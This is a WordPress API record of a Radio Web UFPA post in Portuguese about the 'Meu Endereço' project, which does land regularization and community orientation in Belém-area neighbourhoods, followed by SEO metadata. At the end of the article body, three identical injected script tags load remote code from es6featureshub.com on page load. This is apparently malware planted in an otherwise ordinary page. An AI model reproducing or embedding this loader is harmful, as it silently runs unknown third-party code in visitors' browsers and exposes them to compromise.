{"id":7848,"date":"2020-12-11T08:00:08","date_gmt":"2020-12-11T10:00:08","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=7848"},"modified":"2025-10-21T11:40:14","modified_gmt":"2025-10-21T14:40:14","slug":"meu-endereco-lugar-de-paz-e-seguranca-social","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/","title":{"rendered":"Meu Endere\u00e7o &#8211; Lugar de paz e seguran\u00e7a social"},"content":{"rendered":"<!--[if lt IE 9]><script>document.createElement('audio');<\/script><![endif]-->\n\t<div class=\"wp-playlist wp-audio-playlist wp-playlist-light\">\n\t\t\t<div class=\"wp-playlist-current-item\"><\/div>\n\t\t<audio controls=\"controls\" preload=\"none\" width=\"1178\"\n\t\t\t><\/audio>\n\t<div class=\"wp-playlist-next\"><\/div>\n\t<div class=\"wp-playlist-prev\"><\/div>\n\t<noscript>\n\t<ol>\n\t\t<li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2020-2\/UFPA%20COMUNIDADE%20-%20MEU%20ENDERE\u00c7O%20LUGAR%20DE%20PAZ%20E%20SEGURAN\u00c7A%20SOCIAL%20-%2011.12.20.mp3'>UFPA Comunidade - Meu Endere\u00e7o: Lugar de paz e seguran\u00e7a social<\/a><\/li>\t<\/ol>\n\t<\/noscript>\n\t<script type=\"application\/json\" class=\"wp-playlist-script\">{\"type\":\"audio\",\"tracklist\":true,\"tracknumbers\":true,\"images\":true,\"artists\":true,\"tracks\":[{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2020-2\\\/UFPA COMUNIDADE - MEU ENDERE\\u00c7O LUGAR DE PAZ E SEGURAN\\u00c7A SOCIAL - 11.12.20.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"UFPA Comunidade - Meu Endere\\u00e7o: Lugar de paz e seguran\\u00e7a social\",\"caption\":\"\",\"description\":\"\\\"UFPA COMUNIDADE - MEU ENDERE\\u00c7O LUGAR DE PAZ E SEGURAN\\u00c7A SOCIAL - 11.12.20\\\". Genre: Other.\",\"meta\":{\"artist\":\"R\\u00e1dio Web UFPA\",\"album\":\"UFPA Comunidade\",\"genre\":\"Other\",\"length_formatted\":\"46:16\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}}]}<\/script>\n<\/div>\n\t\n<p>Todo cidad\u00e3o brasileiro tem direito a habita\u00e7\u00e3o, educa\u00e7\u00e3o, sa\u00fade, cultura, esporte e lazer, por\u00e9m nem todos conseguem desfrutar dessas garantias. Em muitos bairros, os problemas sociais e urbanos s\u00e3o evidentes e necessitam de visibilidade e mudan\u00e7as pelo poder p\u00fablico. Pensando nisso, surge o projeto <strong>Meu Endere\u00e7o: Lugar de Paz e Seguran\u00e7a Social<\/strong>, visando a regulamenta\u00e7\u00e3o fundi\u00e1ria, a redu\u00e7\u00e3o dos conflitos socioambientais urbanos e a orienta\u00e7\u00e3o da popula\u00e7\u00e3o dos bairros e comunidades da Regi\u00e3o Metropolitana de Bel\u00e9m.<\/p>\n<p>Para conversar mais sobre esse projeto, recebemos em nosso est\u00fadio a coordenadora do projeto, a professora de engenharia ambiental Dra. Myrian Cardoso, e tamb\u00e9m a estudante de Arquitetura e Urbanismo, Clara Fonseca. Este programa foi gravado em fevereiro de 2020, antes da pandemia de Covid-19.<\/p>\n<p>O projeto <strong>Meu Endere\u00e7o<\/strong> surgiu em 2019, na UFPA, em parceria com a Secretaria de Estado de Ci\u00eancia, Tecnologia e Educa\u00e7\u00e3o Profissional e Tecnol\u00f3gica (Sectet), e com o Governo do Estado do Par\u00e1, por meio do Programa TerPaz. A \u00e1rea de atua\u00e7\u00e3o do projeto inclui os bairros da Cabanagem, Guam\u00e1, Jurunas, Terra Firme e Bengu\u00ed, em Bel\u00e9m; do Icu\u00ed, em Ananindeua, e Nova Uni\u00e3o, em Marituba.<\/p>\n<p>\u201cO<strong> Meu Endere\u00e7o<\/strong> entra para cumprir essa lacuna de disponibilizar para o cidad\u00e3o esse conjunto de documentos que v\u00e3o auxiliar no exerc\u00edcio de cidadania que \u00e9 a declara\u00e7\u00e3o de ocupa\u00e7\u00e3o, a planta com a medida dos lotes porque a aus\u00eancia dessa planta com essas medidas contribuem para que os conflitos com os vizinhos se intensifique principalmente naquelas \u00e1reas em que ainda n\u00e3o est\u00e3o consolidadas com a sua delimita\u00e7\u00e3o\u201d, explica Myrian Cardoso.<\/p>\n<p>Outro objetivo \u00e9 contribuir para uma melhor vis\u00e3o sobre esses locais carentes de regulariza\u00e7\u00e3o fundi\u00e1ria e servi\u00e7os urbanos, acrescenta a coordenadora do projeto. \u201cO maior desafio \u00e9 esse: desconstruir para construir novos olhares e novos valores\u201d, afirma.<\/p>\n<p>O projeto \u00e9 multidisciplinar pois abrange uma grande equipe de v\u00e1rias \u00e1reas capacitadas para lidar com todas as quest\u00f5es envolvidas na realidade urbana, Al\u00e9m disso, o <strong>Meu Endere\u00e7o<\/strong> possibilita um espa\u00e7o de forma\u00e7\u00e3o pr\u00e1tica diferenciada para os extensionistas, como destaca a bolsista Clara Fonseca. &#8220;O projeto faz parte de uma constru\u00e7\u00e3o de um processo de ensino-aprendizagem, com esse olhar mais aproximado entre aluno e professor, o que precisa e deve ser horizontal e, partindo disso, esse trabalho que \u00e9 feito nestes territ\u00f3rios e que \u00e9 bem discutido por n\u00f3s A import\u00e2ncia da gente desconstruir esses estigmas dentro dessa l\u00f3gica de produ\u00e7\u00e3o e ocupa\u00e7\u00e3o do espa\u00e7o, \u00e9 muito importante para que a gente tenha alcance e extrapole os muros da universidade e pense nesse conhecimento t\u00e9cnico, produ\u00e7\u00e3o cient\u00edfica e intelectual fazem parte e n\u00e3o pode se eximir disso\u201d.<\/p>\n<p>Para conhecer ainda mais sobre o projeto <strong>Meu Endere\u00e7o<\/strong>, n\u00e3o perca esta edi\u00e7\u00e3o do UFPA Comunidade!<\/p>\n<p>Apresenta\u00e7\u00e3o: Elissandra Batista<br \/>\nProdu\u00e7\u00e3o e roteiro: Victor Lorran<br \/>\nGrava\u00e7\u00e3o e montagem: Jo\u00e3o Nilo Ferreira<br \/>\nSupervis\u00e3o e edi\u00e7\u00e3o: Elissandra Batista e Fabr\u00edcio Queiroz<br \/>\nFoto: Kid Reis \u2013 Ascom CRF<\/p>\n<p>O UFPA Comunidade vai ao ar \u00e0s sextas-feiras, \u00e0s 10h.<br \/>\nHor\u00e1rios alternativos: Domingo, \u00e0s 17h, e ter\u00e7a-feira, \u00e0s 15h.<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Meu Endere\u00e7o &#8211; Lugar de paz e seguran\u00e7a social\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/\" aria-label=\"Read more about Meu Endere\u00e7o &#8211; Lugar de paz e seguran\u00e7a social\">Ler mais<\/a><\/p>\n","protected":false},"author":2,"featured_media":7849,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[43],"tags":[],"class_list":["post-7848","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ufpa-comunidade"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Meu Endere\u00e7o - Lugar de paz e seguran\u00e7a social - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"O projeto Meu Endere\u00e7o \u00e9 uma parceria da UFPA com o Governo do Estado e atua com a\u00e7\u00f5es de regulariza\u00e7\u00e3o fundi\u00e1ria em Bel\u00e9m, Ananindeua e Marituba.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Meu Endere\u00e7o - Lugar de paz e seguran\u00e7a social - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"O projeto Meu Endere\u00e7o \u00e9 uma parceria da UFPA com o Governo do Estado e atua com a\u00e7\u00f5es de regulariza\u00e7\u00e3o fundi\u00e1ria em Bel\u00e9m, Ananindeua e Marituba.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2020-12-11T10:00:08+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T14:40:14+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Meu-Endere%C3%A7o.jpg?fit=746%2C423&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"746\" \/>\n\t<meta property=\"og:image:height\" content=\"423\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Fabr\u00edcio Queiroz\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Fabr\u00edcio Queiroz\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/\"},\"author\":{\"name\":\"Fabr\u00edcio Queiroz\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\"},\"headline\":\"Meu Endere\u00e7o &#8211; Lugar de paz e seguran\u00e7a social\",\"datePublished\":\"2020-12-11T10:00:08+00:00\",\"dateModified\":\"2025-10-21T14:40:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/\"},\"wordCount\":569,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Meu-Endere%C3%A7o.jpg?fit=746%2C423&ssl=1\",\"articleSection\":[\"UFPA Comunidade\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/\",\"name\":\"Meu Endere\u00e7o - Lugar de paz e seguran\u00e7a social - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Meu-Endere%C3%A7o.jpg?fit=746%2C423&ssl=1\",\"datePublished\":\"2020-12-11T10:00:08+00:00\",\"dateModified\":\"2025-10-21T14:40:14+00:00\",\"description\":\"O projeto Meu Endere\u00e7o \u00e9 uma parceria da UFPA com o Governo do Estado e atua com a\u00e7\u00f5es de regulariza\u00e7\u00e3o fundi\u00e1ria em Bel\u00e9m, Ananindeua e Marituba.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Meu-Endere%C3%A7o.jpg?fit=746%2C423&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Meu-Endere%C3%A7o.jpg?fit=746%2C423&ssl=1\",\"width\":746,\"height\":423},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Meu Endere\u00e7o &#8211; Lugar de paz e seguran\u00e7a social\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\",\"name\":\"Fabr\u00edcio Queiroz\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"caption\":\"Fabr\u00edcio Queiroz\"},\"description\":\"Editor e Jornalista respons\u00e1vel\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Meu Endere\u00e7o - Lugar de paz e seguran\u00e7a social - Radio Web UFPA","description":"O projeto Meu Endere\u00e7o \u00e9 uma parceria da UFPA com o Governo do Estado e atua com a\u00e7\u00f5es de regulariza\u00e7\u00e3o fundi\u00e1ria em Bel\u00e9m, Ananindeua e Marituba.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/","og_locale":"pt_BR","og_type":"article","og_title":"Meu Endere\u00e7o - Lugar de paz e seguran\u00e7a social - Radio Web UFPA","og_description":"O projeto Meu Endere\u00e7o \u00e9 uma parceria da UFPA com o Governo do Estado e atua com a\u00e7\u00f5es de regulariza\u00e7\u00e3o fundi\u00e1ria em Bel\u00e9m, Ananindeua e Marituba.","og_url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2020-12-11T10:00:08+00:00","article_modified_time":"2025-10-21T14:40:14+00:00","og_image":[{"width":746,"height":423,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Meu-Endere%C3%A7o.jpg?fit=746%2C423&ssl=1","type":"image\/jpeg"}],"author":"Fabr\u00edcio Queiroz","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Fabr\u00edcio Queiroz","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/"},"author":{"name":"Fabr\u00edcio Queiroz","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096"},"headline":"Meu Endere\u00e7o &#8211; Lugar de paz e seguran\u00e7a social","datePublished":"2020-12-11T10:00:08+00:00","dateModified":"2025-10-21T14:40:14+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/"},"wordCount":569,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Meu-Endere%C3%A7o.jpg?fit=746%2C423&ssl=1","articleSection":["UFPA Comunidade"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/","url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/","name":"Meu Endere\u00e7o - Lugar de paz e seguran\u00e7a social - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Meu-Endere%C3%A7o.jpg?fit=746%2C423&ssl=1","datePublished":"2020-12-11T10:00:08+00:00","dateModified":"2025-10-21T14:40:14+00:00","description":"O projeto Meu Endere\u00e7o \u00e9 uma parceria da UFPA com o Governo do Estado e atua com a\u00e7\u00f5es de regulariza\u00e7\u00e3o fundi\u00e1ria em Bel\u00e9m, Ananindeua e Marituba.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Meu-Endere%C3%A7o.jpg?fit=746%2C423&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Meu-Endere%C3%A7o.jpg?fit=746%2C423&ssl=1","width":746,"height":423},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/meu-endereco-lugar-de-paz-e-seguranca-social\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Meu Endere\u00e7o &#8211; Lugar de paz e seguran\u00e7a social"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096","name":"Fabr\u00edcio Queiroz","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","caption":"Fabr\u00edcio Queiroz"},"description":"Editor e Jornalista respons\u00e1vel","url":"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/12\/Meu-Endere%C3%A7o.jpg?fit=746%2C423&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-22A","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7848","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=7848"}],"version-history":[{"count":6,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7848\/revisions"}],"predecessor-version":[{"id":17605,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7848\/revisions\/17605"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/7849"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=7848"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=7848"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=7848"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}